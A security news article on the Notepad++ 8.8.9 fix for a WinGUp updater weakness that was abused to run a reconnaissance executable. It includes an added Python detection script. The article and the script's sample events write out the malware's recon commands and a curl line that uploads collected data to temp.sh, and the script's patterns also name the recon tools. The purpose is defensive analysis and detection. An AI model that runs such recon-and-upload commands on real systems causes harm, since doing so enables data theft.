Notepad++ Fixes WinGUp Vulnerability Exploited to Deliver Reconnaissance Malware
Notepad++ has released version 8.8.9 to remediate a weakness in its WinGUp (GUP.exe) update mechanism. Researchers and users had reported incidents in which the updater, instead of fetching a legitimate installer, downloaded and executed a foreign executable from the temporary directory. As a result, an unexpected file—%Temp%\AutoUpdater.exe—appeared on affected systems, where it conducted system reconnaissance and attempted to exfiltrate collected data.
The first warning sign surfaced in a thread on the Notepad++ community forum. According to one user, the rogue AutoUpdater.exe executed commands such as netstat -ano, systeminfo, tasklist, and whoami, redirected the output into a file named a.txt, and then uploaded it to the temp[.]sh service via curl.exe. Since WinGUp relies on the libcurl library rather than an external curl.exe binary and is not designed to perform such data collection, forum participants suspected either the installation of a tampered Notepad++ build or interception and manipulation of update traffic.
The interception scenario appears technically plausible. When checking for updates, Notepad++ requests https://notepad-plus-plus.org/update/getDownloadUrl.php?version=, and the server responds with an XML file containing a field that specifies the installer URL. If an attacker is able to interfere with this delivery chain and alter the URL in the field, the updater will download whatever it is instructed to retrieve, rather than the expected installer.
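The behaviour reported in the forum thread (an updater-spawned executable in %Temp% running netstat, systeminfo, tasklist and whoami, then uploading the result with curl.exe to temp.sh) is narrow enough to detect from process-creation telemetry. The following is an added example, not code from the Notepad++ project or the article; it runs three rules over constructed Sysmon Event ID 1 style records, and the paths, timestamps and the `a.txt` upload command line are assumed sample values.

```python
"""Detect the WinGUp -> %Temp%\\AutoUpdater.exe reconnaissance chain from process events."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

RECON_CMDS = {"netstat.exe", "systeminfo.exe", "tasklist.exe", "whoami.exe"}
UPLOAD_RE = re.compile(r"curl(\.exe)?\s.*temp\.sh", re.IGNORECASE)
TEMP_RE = re.compile(r"\\Temp\\AutoUpdater\.exe$", re.IGNORECASE)

# Constructed sample events: (timestamp, image, parent_image, command_line)
AU = r"C:\Users\u\AppData\Local\Temp\AutoUpdater.exe"
SAMPLE_EVENTS = [
    ("2025-12-01T10:00:00", AU, r"C:\Program Files\Notepad++\updater\GUP.exe", "AutoUpdater.exe"),
    ("2025-12-01T10:00:05", r"C:\Windows\System32\netstat.exe", AU, "netstat -ano"),
    ("2025-12-01T10:00:06", r"C:\Windows\System32\systeminfo.exe", AU, "systeminfo"),
    ("2025-12-01T10:00:07", r"C:\Windows\System32\tasklist.exe", AU, "tasklist"),
    ("2025-12-01T10:00:08", r"C:\Windows\System32\whoami.exe", AU, "whoami"),
    ("2025-12-01T10:00:20", r"C:\Windows\System32\curl.exe", AU,
     "curl.exe -F file=@a.txt https://temp.sh/upload"),
    # Benign: an administrator running a single whoami from cmd.exe an hour later
    ("2025-12-01T11:00:00", r"C:\Windows\System32\whoami.exe", r"C:\Windows\System32\cmd.exe", "whoami"),
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events, window=timedelta(minutes=5), min_recon=3):
    """Return a list of (rule_name, detail) findings."""
    findings = []
    recon_by_parent = defaultdict(list)
    for ts, image, parent, cmdline in events:
        t = datetime.fromisoformat(ts)
        # Rule 1: the updater (GUP.exe) launching AutoUpdater.exe out of %Temp%
        if basename(parent) == "gup.exe" and TEMP_RE.search(image):
            findings.append(("updater_spawned_temp_exe", image))
        # Rule 2: curl.exe invoked to upload to temp.sh
        if basename(image) == "curl.exe" and UPLOAD_RE.search(cmdline):
            findings.append(("curl_upload_temp_sh", cmdline))
        if basename(image) in RECON_CMDS:
            recon_by_parent[parent].append((t, basename(image)))
    # Rule 3: several distinct recon commands from one parent inside a short window
    for parent, runs in recon_by_parent.items():
        runs.sort()
        for i, (t0, _) in enumerate(runs):
            distinct = {name for t, name in runs[i:] if t - t0 <= window}
            if len(distinct) >= min_recon:
                findings.append(("recon_burst", parent))
                break
    return findings
```

Rule 3 deliberately requires several distinct commands from the same parent, so a lone `whoami` from an administrator's shell is not flagged.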
Against this backdrop, security expert Kevin Beaumont reported that he was aware of at least three organizations where incidents were linked to installed instances of Notepad++. According to him, these environments showed signs of “hands-on keyboard” activity—manual reconnaissance already taking place inside the network—and the affected organizations had business ties to East Asia, suggesting a targeted operation rather than indiscriminate noise. At the same time, Beaumont also pointed to a more mundane explanation: the distribution of trojanized builds via malicious advertisements and counterfeit download pages, a recurring risk for widely used utilities.
In response, Notepad++ developer Don Ho initially released version 8.8.8 on November 18 to reduce exposure by restricting updates to downloads hosted exclusively on GitHub. With version 8.8.9, released on December 9, stronger safeguards were introduced: WinGUp now verifies both the digital signature and the certificate of the downloaded installer, aborting the update process if validation fails. The project team emphasized that the investigation into the root cause of the traffic substitution is still ongoing.
Users are advised to upgrade to version 8.8.9 and to obtain installers solely from official sources. The advisory also reiterates that since version 8.8.7, all official binaries and installers have been signed with a valid certificate, and that anyone who previously installed a custom root certificate for legacy use cases should remove it to avoid unnecessarily expanding the attack surface.